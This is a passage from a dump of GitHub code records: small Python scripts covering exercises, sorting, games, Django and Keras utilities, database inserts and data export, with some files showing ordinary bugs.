range(1,int(LIMIT/3)):\n for b in range(a,math.floor((LIMIT-a)/2)):\n c = math.sqrt(a**2 + b**2)\n p = int(a + b + c) # Perimeter \n if (c % 1 == 0 and p <= LIMIT): # Integer solution \n perims[p] += 1 # Solution hit\n\n return perims.index(max(perims)) # Print the index with the highest hits\n\nif __name__ == '__main__':\n print(solve())\n","repo_name":"eugenekolo/project-euler","sub_path":"euler039.py","file_name":"euler039.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"30575913948","text":"edad=int(input(\"Ingresa tu edad: \"))\n\ndef evaluaEdad(edad):\n\n\tif edad<0:\n\t\traise NameError(\"Edad no válida\")\n\n\tif edad<20:\n\t\treturn \"Eres muy joven\"\n\telif edad<40:\n\t\treturn \"Eres joven\"\n\telif edad<65:\n\t\treturn \"Eres maduro\"\n\telif edad<100:\n\t\treturn \"Cuídate...\"\n\ntry:\n\tprint(evaluaEdad(edad))\nexcept NameError:\n\tprint(\"Has introducido una edad no válida\")\nfinally:\n\tprint(\"El programa ha finalizado\")","repo_name":"WillOsoc/CursoPython","sub_path":"23_Excepciones2.py","file_name":"23_Excepciones2.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10718600188","text":"import pandas\n\n# Reading data\ndf = pandas.read_csv('aria.csv', sep=';', parse_dates=['Date'])\n\n# Stores the highest Low value\nhighestLowValue = None\n# Count of the current high streak\nhighStreak = 0\n# Can be buy, hold, sell\naction = None\n# Indicates if a buy has been executed.\nbuy = False\n# Stores the lowest Low value\nlowestLowValue = None\n# Cound of the current low streak\nlowStreak = 0\n# List of actions\nactions = []\n\nfor index, row in df.iterrows():\n curLowValue = row['Low']\n\n # First row will be handled differently\n # Setting highest Low value\n if not highestLowValue:\n highestLowValue = curLowValue\n # Setting highest Low value and counting the streak\n elif curLowValue >= highestLowValue:\n highestLowValue = curLowValue\n highStreak += 1\n else:\n # Resetting streak\n highStreak = 0\n\n # First row will be handled differently\n # Setting lowest Low value\n if not lowestLowValue:\n lowestLowValue = curLowValue\n # Setting lowest Low value and counting the streak\n elif curLowValue < lowestLowValue:\n lowestLowValue = curLowValue\n lowStreak += 1\n else:\n # Resetting streak\n lowStreak = 0\n\n # Setting action depending on action and buy execution\n if (action is None or action != 'buy') and not buy and highStreak == 2:\n action = \"buy\"\n buy = True\n elif buy and lowStreak == 2:\n action = \"sell\"\n buy = False\n else:\n action = \"hold\"\n\n actions.append(action)\n\n# Appending column\ndf['Action'] = actions\n\npandas.set_option('display.max_rows', None)\nprint(df)\n\ndf.to_csv('aria-out.csv', sep=';', encoding='utf-8')\n","repo_name":"captain-bu/aria-finance","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"19680039423","text":"from setuptools import setup\nimport platform\nmachine = platform.machine()\n\nsetup( \n name='demographics',\n \n version='0.11',\n description='Face demographics based on age and gender',\n url='http://demo.vedalabs.in/',\n\n # Author details \n author='Atinderpal Singh',\n author_email='atinderpalap@gmail.com',\n\n packages=['demographics'],\n install_requires=['numpy'] if machine=='x86_64' else ['numpy'],\n package_data={\n 'demographics':['model_age/checkpoint*', 'model_gender/checkpoint*'],\n },\n\n zip_safe=False\n )\n","repo_name":"MacherLabs/demographics","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71216054651","text":"# Faça um Programa que peça um número correspondente a um determinado ano e em seguida informe se este ano é ou não bissexto.\n\ntry:\n # Pedir o ano para o usuário e atribuir a uma variável\n year = input('Informe o ano: ')\n # alterar o tipo da variável para o tipo inteiro\n year = int(year)\n # declarar uma variável 'bissexto' para receber o resultado das estruturas de decisão\n leapYear = None\n # verificar se o ano é múltiplo de 100\n if (year%100) == 0 :\n # se for múltiplo de 100 deve-se verificar se é divisível por 400\n if (year%400) == 0:\n # se for divisível por 400 o ano é bissexto, então atribuir o valor 'True' para a variável 'bissexto'\n leapYear = True\n # se for indivisível por 400 o ano não é bissexto, então atribuir o valor 'False\" para a variável 'bissexto'\n else:\n leapYear = False\n # se não for múltiplo de 100 deve-se verificar se é divisível por 4\n else:\n if (year%4) == 0:\n # se for divisível por 4 o ano é bissexto, então atribuir o valor 'True' para a variável 'bissexto'\n leapYear = True\n # se for indivisível por 4 a ano não é bissexto, então atribuir o valor 'False\" para a variável 'bissexto'\n else:\n leapYear = False\n # imprimir na tela o resultado da decisão\n if leapYear == True:\n print('O ano informado é bissexto.')\n else:\n print('O ano informado não é bissexto.')\nexcept:\n print('Erro!')","repo_name":"glaucomori/PythonProjects","sub_path":"ListaDeExercícios_PythonBrasil/02-Estrutura_de_Decisão/practice17.py","file_name":"practice17.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1636121847","text":"import os\r\n\r\nafinn_path = os.path.join(os.path.dirname(__file__), 'AFINN-111.txt')\r\nwith open(afinn_path, 'r') as f:\r\n afinn = dict(map(str.strip, line.split('\\t')) for line in f)\r\n\r\n# Define a function to calculate the sentiment score of a text using the AFINN lexicon\r\ndef calculate_sentiment(text):\r\n words = text.split()\r\n score = sum([int(afinn.get(word.lower(), 0)) for word in words])\r\n print(len(words))\r\n return score\r\n\r\n\r\n\r\ntext1 = \"The product is very good. I liked it.\"\r\n\r\nobj = calculate_sentiment(text1)\r\nprint(obj)","repo_name":"abm2707/Amazon_final","sub_path":"Amazon23/sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"43142122586","text":"import pandas as pd\nimport json\nimport requests\nimport read_credentials\n\ndef get_metadata(credentials_path=None, query_url = 'https://api.github.com/repos/mlflow/mlflow'):\n\n params = {\"page\": \"1\", \"per_page\": \"100\"}\n headers = {\"Accept\": \"application/vnd.github.v3+json\"}\n TOKEN = read_credentials.get_credentials(credentials_path)\n auth = ('sjster', TOKEN)\n\n r = requests.get(query_url, headers=headers, params=params, auth=auth)\n repo_data = r.json()\n\n if(r.status_code == 200):\n print(repo_data['created_at'])\n print(repo_data['updated_at'])\n print(repo_data['forks_count'])\n print(repo_data['open_issues'])\n print(repo_data['stargazers_count']) # stars\n print(repo_data['subscribers_count']) # watchers\n\n repo_metadata = {'created_at': repo_data['created_at'],\n 'updated_at': repo_data['updated_at'],\n 'forks_count': repo_data['forks_count'],\n 'open_issues': repo_data['open_issues'],\n 'starred': repo_data['stargazers_count'],\n 'watchers': repo_data['subscribers_count']}\n\n with open('data/mlflow_metadata.json','w') as f:\n json.dump(repo_metadata, f)\n\n return_val = 0\n else:\n reason = r.reason\n return_val = r.status_code\n print(f'Request failed with error {return_val} with {reason}')\n\n return(return_val)\n\n\nif __name__ == '__main__':\n return_val = get_metadata(credentials_path)\n","repo_name":"sjster/mlflow_dashboard","sub_path":"get_repo_metadata.py","file_name":"get_repo_metadata.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7048571455","text":"from django.shortcuts import get_object_or_404\nfrom rest_framework import viewsets\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import action\n\nfrom .models import Mailing, Client, Message\nfrom .serializers import MailingSerializer, ClientSerializer, MessageSerializer\n\n\nclass ClientViewSet(viewsets.ModelViewSet):\n serializer_class = ClientSerializer\n queryset = Client.objects.all()\n\n\nclass MessageViewSet(viewsets.ModelViewSet):\n serializer_class = MessageSerializer\n queryset = Message.objects.all()\n\n\nclass MailingViewSet(viewsets.ModelViewSet):\n serializer_class = MailingSerializer\n queryset = Mailing.objects.all()\n\n @action(detail=True, methods=['get'])\n def info(self, request, pk=None):\n get_object_or_404(Mailing, pk=pk)\n messages_qs = Message.objects.filter(mailing_id=pk)\n serializer = MessageSerializer(messages_qs, many=True)\n return Response(serializer.data)\n\n @action(detail=False, methods=['get'])\n def fullinfo(self, request):\n total_count = Mailing.objects.count()\n mailings = Mailing.objects.values('id')\n content = {\n 'Total number of mailings': total_count,\n 'The number of messages sent': '',\n }\n result = {}\n\n for mailing in mailings:\n message = Message.objects.filter(mailing_id=mailing['id'])\n mailing_result = {\n 'Total messages': 0,\n Message.SENT: 0,\n Message.NO_SENT: 0\n }\n count_sent = message.filter(status=Message.SENT).count()\n count_no_sent = message.filter(status=Message.NO_SENT).count()\n\n mailing_result['Total messages'] = len(message)\n mailing_result[Message.SENT] = count_sent\n mailing_result[Message.NO_SENT] = count_no_sent\n\n result[mailing['id']] = mailing_result\n\n content['The number of messages sent'] = result\n return Response(content)\n","repo_name":"s3r3ga/sms_messages","sub_path":"sms_msgs/sms/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1995,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"35577740366","text":"from time import time\nfrom typing import Callable, Optional, Union, Tuple\n\nimport numpy as np\nfrom keras.callbacks import EarlyStopping, TensorBoard, Callback\nfrom keras.optimizers import RMSprop\n\nimport wandb\nfrom wandb.keras import WandbCallback\n\nfrom datasets.base import Dataset\nfrom models.base import Model\nfrom training.gpu_util_sampler import GPUUtilizationSampler\n\n\nEARLY_STOPPING = False\nGPU_UTIL_SAMPLER = False\n\nclass Metrics(Callback):\n\n def on_train_begin(self, logs={}):\n self.val_precisions = []\n self.val_profits = []\n \n def on_epoch_end(self, epoch, logs={}):\n val_predict = (np.asarray(self.model.predict(self.validation_data[0]))).round()[:,0]\n val_targ = self.validation_data[1][:,0]\n \n true_positives = np.sum(np.round(val_predict * val_targ))\n false_positives = np.sum(np.round(val_predict * (1-val_targ)))\n predicted_positives = np.sum(np.round(val_predict))\n _val_precision = true_positives / (predicted_positives + 1e-7)\n _val_profit = 96 * true_positives - 104 * false_positives\n self.val_precisions.append(_val_precision)\n self.val_profits.append(_val_profit)\n print (f'- val_precision: {_val_precision} - val_profit: {_val_profit}')\n wandb.log({'val_precision': _val_precision, 'val_profit': _val_profit})\n return\n \n\n\ndef train_model(model: Model, dataset: Dataset, epochs: int, batch_size: int, learning_rate: float, gpu_ind: Optional[int]=None, use_wandb=False) -> Model:\n callbacks = []\n\n callbacks.append(Metrics())\n \n if EARLY_STOPPING:\n early_stopping = EarlyStopping(monitor='val_loss', min_delta=0.01, patience=3, verbose=1, mode='auto')\n callbacks.append(early_stopping)\n\n if GPU_UTIL_SAMPLER and gpu_ind is not None:\n gpu_utilization = GPUUtilizationSampler(gpu_ind)\n callbacks.append(gpu_utilization)\n\n if use_wandb:\n wandb = WandbCallback()\n callbacks.append(wandb)\n\n model.network.summary()\n\n t = time()\n history = model.fit(dataset, batch_size, epochs, learning_rate, callbacks)\n print('Training took {:2f} s'.format(time() - t))\n\n if GPU_UTIL_SAMPLER and gpu_ind is not None:\n gpu_utilizations = gpu_utilization.samples\n print(f'GPU utilization: {round(np.mean(gpu_utilizations), 2)} +- {round(np.std(gpu_utilizations), 2)}')\n\n return model\n","repo_name":"toolkmit/algotrading","sub_path":"training/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2395,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"3163902041","text":"def mergeSort(array,low,high):\n if(low >= high): return\n mid=(low+high)//2\n mergeSort(array,low,mid)\n # print(array[low:high])\n mergeSort(array,mid+1,high)\n # print(array[low:high])\n merge(array,low,mid,high)\n # print(array)\n\ndef merge(array,low,mid,high):\n temp=[]\n left=low\n right=mid+1\n while(left<=mid and right<=high):\n if(array[left] <= array[right]):\n temp.append(array[left])\n left+=1\n else:\n temp.append(array[right])\n right+=1\n while(left <=mid):\n temp.append(array[left])\n left+=1\n while(right<=high):\n temp.append(array[right])\n right+=1\n for i in range (low,high+1):\n array[i]=temp[i-low]\n\narray=[]\nn=int(input(\"enter length of array:\"))\nfor i in range (n):\n array.append(int(input(\"element: \")))\nprint(array)\nprint(mergeSort(array,0,n-1))\n","repo_name":"Ha-ri-ka/DSA-Practice","sub_path":"Basics/Sorting Algorithms/mergeSort.py","file_name":"mergeSort.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"24550343468","text":"from pcinput import getString\r\nfrom random import randint\r\n\r\nEMPTY = \".\"\r\nBATTLESHIP = \"X\"\r\nSHIPS = 3\r\nWIDTH = 4\r\nHEIGHT = 3\r\n\r\ndef displayBoard( b ):\r\n print( \" \", end=\"\" )\r\n for col in range( WIDTH ):\r\n print( chr( ord(\"A\")+col ), end=\" \" )\r\n print()\r\n for row in range( HEIGHT ):\r\n print( row+1, end=\" \")\r\n for col in range( WIDTH ):\r\n print( b[row][col], end=\" \" )\r\n print()\r\n\r\ndef placeBattleships( b ):\r\n for i in range( SHIPS ):\r\n while True:\r\n x = randint( 0, WIDTH-1 )\r\n y = randint( 0, HEIGHT-1 )\r\n if b[y][x] == BATTLESHIP:\r\n continue\r\n if x > 0 and b[y][x-1] == BATTLESHIP:\r\n continue\r\n if x < WIDTH-1 and b[y][x+1] == BATTLESHIP:\r\n continue\r\n if y > 0 and b[y-1][x] == BATTLESHIP:\r\n continue\r\n if y < HEIGHT-1 and b[y+1][x] == BATTLESHIP:\r\n continue\r\n break\r\n b[y][x] = BATTLESHIP\r\n \r\ndef getTarget():\r\n while True:\r\n cell = getString( \"Which cell do you target? \" ).upper()\r\n if len( cell ) != 2:\r\n print( \"Please enter a cell as XY,\",\r\n \"where X is a letter and Y a digit\" )\r\n continue\r\n if cell[0] not in \"ABCD\":\r\n print( \"The first character of the cell\",\r\n \"should be a letter in the range A-\"+\r\n chr( ord(\"A\")+WIDTH-1 ) )\r\n continue\r\n if cell[1] not in \"123\":\r\n print( \"The second character of the cell should be\",\r\n \"a digit in the range 1-\"+str( HEIGHT ) )\r\n continue\r\n return ord(cell[0])-ord(\"A\"), ord(cell[1])-ord(\"1\") \r\n \r\nboard = []\r\nfor i in range( HEIGHT ):\r\n row = WIDTH * [EMPTY]\r\n board.append( row )\r\nplaceBattleships( board )\r\ndisplayBoard( board )\r\n\r\nhits = 0\r\nmoves = 0\r\nwhile hits < SHIPS:\r\n x, y = getTarget()\r\n if board[y][x] == BATTLESHIP:\r\n print( \"You sunk my battleship!\" )\r\n board[y][x] = EMPTY\r\n hits += 1\r\n else:\r\n print( \"Miss!\" )\r\n moves += 1\r\n\r\nprint( \"You needed\", moves, \"moves to sink all battleships.\" )","repo_name":"arvinmv/open-notes","sub_path":"Intro to CS with Python/src/solutions/answer1207.py","file_name":"answer1207.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36743400687","text":"import sacred\nfrom sacred.observers import FileStorageObserver\nfrom simulation_logic import do_one_parameter_config\nimport numpy as np\n\nex = sacred.Experiment(\"simulation\")\nex.observers.append(FileStorageObserver(\"data\"))\n\n\n@ex.config\ndef cfg(): \n rx1 = 0.75\n ry1 = 0.125\n dist = 0.15\n cx1 = -rx1 - dist /2.\n cy1 = 0\n AS1 = 15.\n cx2 = -cx1\n cy2 = cy1\n rx2 = rx1\n ry2 = ry1\n AS2 = AS1\n nr = 1\n ang = nr / 180. * np.pi\n nft = 80\n nx1 = 31\n ny1 = 81\n nx2 = 100\n ny2 = 50\n q = 1.035\n err_0 = 1e-4\n err_w = 1e-4\n num_iter = 500\n dt0 = 5e-4\n aq = 0\n xis = 5e-2\n t_save = 0\n n_expos = 80\n ns = 5\n dt_save = ns * n_expos * dt0\n gpx = 10\n gpy = 8\n gamma = 0.045\n zeta = 15.\n \n kkappa = 0\n lambdat = 0\n gp = 0\n \n sp = 1.5\n \n bf = 10 * gamma\n \n psi = 0\n\n poff = 20.\n \n pn1 = 15.\n pn2 = pn1 / 20.\n \n pu = poff / 2.\n\n \n pm = 12.\n bell_shape_x = 8.\n bell_shape_y = 8.\n\n eta = 1.\n a = 1.\n ka = 0.8\n pei0 = 0.001\n\n\n\n@ex.automain\ndef run_one_simulation(_config, _run):\n do_one_parameter_config(\n cx1=_config[\"cx1\"],\n cy1=_config[\"cy1\"],\n rx1=_config[\"rx1\"],\n ry1=_config[\"ry1\"],\n AS1=_config[\"AS1\"],\n cx2=_config[\"cx2\"],\n cy2=_config[\"cy2\"],\n rx2=_config[\"rx2\"],\n ry2=_config[\"ry2\"],\n AS2=_config[\"AS2\"],\n ang=_config[\"ang\"],\n dist=_config[\"dist\"],\n nx1=_config[\"nx1\"],\n ny1=_config[\"ny1\"],\n nx2=_config[\"nx2\"],\n ny2=_config[\"ny2\"],\n q=_config[\"q\"],\n err_0=_config[\"err_0\"],\n err_w=_config[\"err_w\"],\n num_iter=_config[\"num_iter\"],\n dt0=_config[\"dt0\"],\n aq=_config[\"aq\"],\n t_save=_config[\"t_save\"],\n dt_save=_config[\"dt_save\"],\n gpx=_config[\"gpx\"],\n gpy=_config[\"gpy\"],\n gamma=_config[\"gamma\"],\n zeta=_config[\"zeta\"],\n kkappa=_config[\"kkappa\"],\n lambdat=_config[\"lambdat\"],\n gp=_config[\"gp\"],\n poff=_config[\"poff\"],\n pn1=_config[\"pn1\"],\n pn2 =_config[\"pn2\"],\n pu=_config[\"pu\"],\n pm=_config[\"pm\"],\n bell_shape_x=_config[\"bell_shape_x\"],\n bell_shape_y=_config[\"bell_shape_y\"],\n xis=_config[\"xis\"],\n eta=_config[\"eta\"],\n n_expos=_config[\"n_expos\"],\n sp=_config[\"sp\"],\n a = _config[\"a\"],\n bf= _config[\"bf\"],\n ka= _config[\"ka\"],\n psi= _config[\"psi\"],\n pei0= _config[\"pei0\"],\n nft= _config[\"nft\"],\n SAVE=True,\n ex=ex,\n SAVE_data=True\n )\n","repo_name":"fy26/ActiveMatter","sub_path":"Simulation/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"25550770609","text":"import pygame, sys\r\nfrom pygame.locals import *\r\n\r\n'''\r\nNOMBRE: FABRICIO\r\nAPELLIDO: DE SA TORRES\r\nDIVISIÓN: B\r\nEJERCICIO: Ejercicio 03 (Imagenes Pygame)\r\nESTADO: Ejercicio entregado\r\n'''\r\n\r\nBLANCO = (255,255,255) \r\nROJO = (255,0,0)\r\nAZUL = (0,0,255)\r\nVERDE = (0,255,0)\r\nCELESTE = (0,150,255)\r\nNEGRO = (0,0,0) \r\n\r\npygame.init()\r\n\r\nventana = pygame.display.set_mode((1500,1000))\r\n\r\npygame.display.set_caption(\"Ejercicio 3 - Imágenes Pygame\")\r\n\r\nfuente = pygame.font.SysFont(\"Arial\",30)\r\n\r\nimagen1 = pygame.image.load(\"CLASE 04\\serpiente.png\")\r\nimagen1 = pygame.transform.scale(imagen1, (100,100))\r\n\r\nimagen2 = pygame.image.load(\"CLASE 04\\control.png\")\r\nimagen2 = pygame.transform.scale(imagen2, (100,100))\r\n\r\n\r\nimagen3 = pygame.image.load(\"CLASE 04\\compu.png\")\r\nimagen3 = pygame.transform.scale(imagen3, (100,100))\r\n\r\na1 = {\"nombre\":\"serpiente\",\"edad\":3,\"imagen\":imagen1}\r\na2 = {\"nombre\":\"control\",\"edad\":11,\"imagen\":imagen2}\r\na3 = {\"nombre\":\"compu\",\"edad\":2,\"imagen\":imagen3}\r\nlista_imagenes = [a1,a2,a3]\r\n\r\nventana.fill(ROJO)\r\n\r\nflag_run = True\r\ny = 50\r\nwhile flag_run:\r\n lista_eventos = pygame.event.get()\r\n for evento in lista_eventos:\r\n if evento.type == pygame.QUIT:\r\n flag_run = False\r\n \r\n for datos in lista_imagenes:\r\n nombre = datos[\"nombre\"]\r\n edad = str(datos[\"edad\"])\r\n imagen = datos[\"imagen\"]\r\n\r\n ventana.blit(imagen,(50,y))\r\n\r\n texto_nombre = fuente.render(nombre,False,BLANCO,NEGRO)\r\n ventana.blit(texto_nombre,(160,y))\r\n\r\n texto_edad = fuente.render(edad,False,BLANCO,NEGRO)\r\n ventana.blit(texto_edad,(270,y))\r\n\r\n y += 110\r\n\r\n if y > 270:\r\n y = 50\r\n \r\n \r\n\r\n pygame.display.update()\r\npygame.quit()","repo_name":"FABRIDESA/Programacion-y-Laboratorio-I","sub_path":"EJERCICIOS/3/Ejercicio 03 (Imagenes Pygame).py","file_name":"Ejercicio 03 (Imagenes Pygame).py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"9157816524","text":"# -*- coding: utf-8 -*-\n# @Software: PyCharm\n# @File: PythonExecutemany.py\n\nimport pymysql\n\n# 数据库连接信息\nhost = ''\nusername = ''\npassword = ''\ndb = ''\nconnect = pymysql.connect(host=host, user=username, password=password, database=db, charset=\"utf-8\")\ncursors = connect.cursor()\n\nxing_lists = ['pan', 'lang', 'jiang', 'gong', 'gan', 'yu', 'hao', 'xia', 'que', 'tian', 'zhang', 'long', 'dou', 'guo',\n 'wen', 'wei', 'ren', 'jiao', 'gu', 'sang', 'chen', 'xu', 'zhuo', 'bing', 'zhen', 'ding', 'ye', 'wo',\n 'feng', 'wan', 'zhuang', 'zui', 'liang', 'heng', 'mei', 'huan', 'xue', 'dang', 'bu', 'yuan', 'liu',\n 'chai', 'qin', 'liao', 'lin', 'xing', 'bei', 'dong', 'yun', 'wu', 'gui', 'fu', 'qiang', 'ling', 'huo',\n 'jia', 'pei', 'lao', 'mo', 'qiu', 'ning', 'xian', 'shu', 'chang', 'zi', 'tu', 'you', 'ying', 'hong',\n 'duan', 'zhai', 'han', 'sha', 'gou', 'tan', 'shui', 'kan', 'zhan', 'kuang', 'kui', 'sun', 'xun', 'hang',\n 'tai', 'geng', 'leng', 'zu', 'lai', 'zai', 'peng', 'ben', 'ni', 'che', 'tang', 'ping', 'bao', 'mao',\n 'shan', 'hu', 'zhi', 'kang', 'sheng', 'min', 'xiong', 'zou', 'cong', 'neng', 'zuo', 'mi', 'nie', 'ji',\n 'kuai', 'shou', 'xie', 'ba', 'ju', 'ke', 'zan', 'fan', 'lan', 'xin', 'hou', 'mong', 'shuang', 'chong',\n 'ru', 'su', 'yang', 'kou', 'ran', 'du', 'qian', 'zhao', 'yi', 'zhu', 'pu', 'bai', 'zong', 'miao', 'suo',\n 'li', 'cheng', 'cen', 'song', 'di', 'tou', 'jing', 'pi', 'hua', 'yong', 'zhou', 'he', 'yin', 'chao', 'qi',\n 'jian', 'teng', 'zheng', 'yan', 'qiao', 'kong', 'lu', 'deng', 'zhong', 'xuan', 'lou', 'pang', 'zang',\n 'yao', 'shi', 'shen', 'fei', 'xi', 'quan', 'cao', 'zha', 'tong', 'meng', 'fang', 'wang', 'tao', 'ruan',\n 'gao', 'chi', 'rong', 'lei', 'niu', 'shao', 'qu', 'bi', 'ge', 'luan', 'chu', 'jin', 'lian', 'ming',\n 'shang', 'mu', 'bian', 'nong', 'xiao', 'guan', 'man', 'na', 'dai', 'diao', 'rao', 'ban', 'she', 'ma',\n 'xiang', 'yue', 'huang', 'huai', 'cang', 'cui', 'cai', 'an', 'ou', 'ai', 'ao', 'e', 'weng']\n\nming_lists = ['ai', 'an', 'ang', 'ao', 'ba', 'bai', 'ban', 'bang', 'bao', 'be', 'bei', 'ben', 'beng', 'bi', 'bian',\n 'biao', 'bie', 'bin', 'bing', 'bo', 'bu', 'ca', 'cai', 'can', 'cang', 'cao', 'ce', 'cen', 'ceng', 'cha',\n 'chai', 'chan', 'chang', 'chao', 'che', 'chen', 'cheng', 'chi', 'chong', 'chou', 'chu', 'chuai', 'chuan',\n 'chuang', 'chui', 'chun', 'chuo', 'ci', 'cong', 'cou', 'cu', 'cuan', 'cui', 'cun', 'cuo', 'da', 'dai',\n 'dan', 'dang', 'dao', 'de', 'deng', 'di', 'dian', 'diao', 'die', 'ding', 'diu', 'dong', 'dou', 'du',\n 'duan', 'dui', 'dun', 'duo', 'e', 'en', 'er', 'fa', 'fan', 'fang', 'fei', 'fen', 'feng', 'fou', 'fu',\n 'zhuang', 'ga', 'gai', 'gan', 'gang', 'gao', 'ge', 'gei', 'gen', 'geng', 'gong', 'gou', 'gu', 'gua',\n 'guai', 'guan', 'guang', 'gui', 'gun', 'guo', 'ha', 'hai', 'han', 'hang', 'hao', 'he', 'hei', 'hen',\n 'heng', 'hong', 'hou', 'hu', 'hua', 'huai', 'huan', 'huang', 'hui', 'hun',\n 'huo', 'ji', 'jia', 'jian', 'jiang', 'jiao', 'jie', 'jin', 'jing', 'jiong', 'jiu', 'jou', 'ju', 'juan',\n 'jue', 'jun', 'ka', 'kai', 'kan', 'kang', 'kao', 'ke', 'ken', 'keng', 'kong', 'kou', 'ku', 'kua', 'kuai',\n 'kuan', 'kuang', 'kui', 'kun', 'kuo', 'la', 'lai', 'lan', 'lang', 'lao', 'le', 'lei', 'leng', 'li',\n 'lian', 'liang', 'liao', 'lie', 'lin', 'ling', 'liu', 'long', 'lou', 'lu', 'luan', 'lue', 'lun', 'luo',\n 'ma', 'mai', 'man', 'mang', 'mao', 'me', 'mei', 'men', 'meng', 'mi', 'mian', 'miao', 'mie', 'min', 'ming',\n 'miu', 'mo', 'mou', 'mu', 'na', 'nai', 'nan', 'nang', 'nao', 'nei', 'nen', 'neng', 'ni', 'nian', 'niang',\n 'niao', 'nie', 'nin', 'ning', 'niu', 'nong', 'nou', 'nu', 'nuan', 'nue', 'nun', 'nuo', 'ou', 'pa', 'pai',\n 'pan', 'pang', 'pao', 'pei', 'pen', 'peng', 'pi', 'pian', 'piao', 'pie', 'pin', 'ping', 'po', 'pou', 'pu',\n 'qi', 'qia', 'qian', 'qiang', 'qiao', 'qie', 'qin', 'qing', 'qiong', 'qiu', 'qu', 'quan', 'que', 'qun',\n 'ran', 'rang', 'rao', 're', 'ren', 'reng', 'ri', 'rong', 'rou', 'ru', 'ruan', 'rui', 'run', 'ruo', 'sa',\n 'sai', 'san', 'sang', 'sao', 'se', 'sei', 'sen', 'seng', 'sha', 'shai', 'shan', 'shang', 'shao', 'she',\n 'shen', 'sheng', 'shi', 'shou', 'shu', 'shua', 'shuai', 'shuan', 'shuang', 'shui', 'shun', 'shuo', 'si',\n 'song', 'sou', 'su', 'suan', 'sui', 'sun', 'suo', 'ta', 'tai', 'tan', 'tang', 'tao', 'te', 'teng', 'ti',\n 'tian', 'tiao', 'tie', 'ting', 'tong', 'tou', 'tu', 'tuan', 'tui', 'tun', 'tuo', 'wa', 'wai', 'wan',\n 'wang', 'wei', 'wen', 'weng', 'wo', 'wu', 'xi', 'xia', 'xian', 'xiang', 'xiao', 'xie', 'xin', 'xing',\n 'xiong', 'xiu', 'xu', 'xuan', 'xue', 'xun', 'ya', 'yan', 'yang', 'yao', 'ye', 'yi', 'yin', 'ying', 'yong',\n 'you', 'yu', 'yuan', 'yue', 'yun', 'za', 'zai', 'zan', 'zang', 'zao', 'ze', 'zei', 'zen', 'zeng', 'zha',\n 'zhai', 'zhan', 'zhang', 'zhao', 'zhe', 'zhen', 'zheng', 'zhi', 'zhong', 'zhou', 'zhu', 'zhua', 'zhuai',\n 'zhuan', 'zhui', 'zhun', 'zhuo', 'zi', 'zong', 'zou', 'zu', 'zuan', 'zui', 'zun', 'zuo', 'nv', 'nve',\n 'lia', 'lv']\n \ndef executemany_sql():\n sqls = f'insert ignore into table_name (username) values (%s)'\n usersvalues = []\n for xing_list in xing_lists:\n for ming_list1 in ming_lists:\n for ming_list2 in ming_lists:\n emails = xing_list + ming_list1 + ming_list2 + '@163.com'\n usersvalues.append((emails))\n if len(usersvalues) == 1000:\n cursor = connect.cursor()\n ursor.executemany(sqls, usersvalues)\n connect.commit()\n usersvalues = []\n\n cursor = connect.cursor()\n cursor.executemany(write_sql, usersvalues)\n connect.commit()\n\n\nif __name__ == '__main__':\n executemany_sql()\n connect.close()\n","repo_name":"songcheng1/PythonDealWithFileAndMysql","sub_path":"PythonExecutemanyMysql.py","file_name":"PythonExecutemanyMysql.py","file_ext":"py","file_size_in_byte":6200,"program_lang":"python","lang":"tg","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7145255435","text":"import pymongo\nimport csv\n\n\n# Creates the header for the csv with translation, for example translation={'_id': 'ID'},\n# so that field name '_id' becomes 'ID' in the header\ndef create_header(field_names, translation=None) -> str:\n if translation is None:\n translation = dict()\n header = ''\n\n for i in range(len(field_names)):\n if field_names[i] in translation.keys():\n header = header + translation[field_names[i]]\n elif field_names[i].split('/')[-1] in translation.keys():\n header = header + translation[field_names[i].split('/')[-1]]\n else:\n header = header + field_names[i].split('/')[-1]\n if i + 1 < len(field_names):\n header = header + ', '\n return header + '\\n'\n\n\n# Extracts the wanted fields (names/values) from a source dictionary that can have a tree like structure,\n# Like a document with Array fields\ndef extract_fields(source, fields, parent='') -> dict:\n extracted = {}\n for field in fields:\n if type(field) is not dict:\n if field in source:\n extracted[parent+str(field)] = source[field]\n else:\n print(\"Couldn't find (value) {}\".format(field))\n extracted[parent+str(field)] = None\n else:\n sub_source_key = tuple(field.keys())[0]\n sub_fields = tuple(field.values())[0]\n if sub_source_key in source:\n sub = extract_fields(source[sub_source_key], sub_fields, parent=parent+str(sub_source_key)+'/')\n extracted.update(sub)\n else:\n print(\"Couldn't find (Array/Object) 